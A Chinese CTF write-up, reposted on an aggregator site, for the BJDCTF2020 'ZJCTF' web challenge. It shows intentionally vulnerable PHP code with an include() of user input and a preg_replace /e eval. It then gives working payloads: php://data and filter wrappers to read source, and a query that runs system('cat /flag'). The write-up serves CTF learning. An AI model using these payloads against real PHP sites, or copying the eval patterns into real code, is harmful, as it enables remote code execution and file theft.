[BJDCTF2020]ZJCTF,不过如此
Posted buchuo
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[BJDCTF2020]ZJCTF,不过如此相关的知识,希望对你有一定的参考价值。
知识点:
preg_replace()使用的/e模式可以存在远程执行代码
解析见链接:https://xz.aliyun.com/t/2557
看题目
首先是一段源代码:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,‘r‘)==="I have a dream")){
echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
text是PHP的DATA伪协议 file是PHP的filter伪协议
payload:
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
得到第二段源代码:
<?php
$id = $_GET[‘id‘];
$_SESSION[‘id‘] = $id;
function complex($re, $str) {
return preg_replace(
‘/(‘ . $re . ‘)/ei‘,
‘strtolower("\1")‘,
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "
";
}
function getFlag(){
@eval($_GET[‘cmd‘]);
}
payload如下:
next.php?S*=${getflag()}&cmd=system(‘cat /flag‘);
以上是关于[BJDCTF2020]ZJCTF,不过如此的主要内容,如果未能解决你的问题,请参考以下文章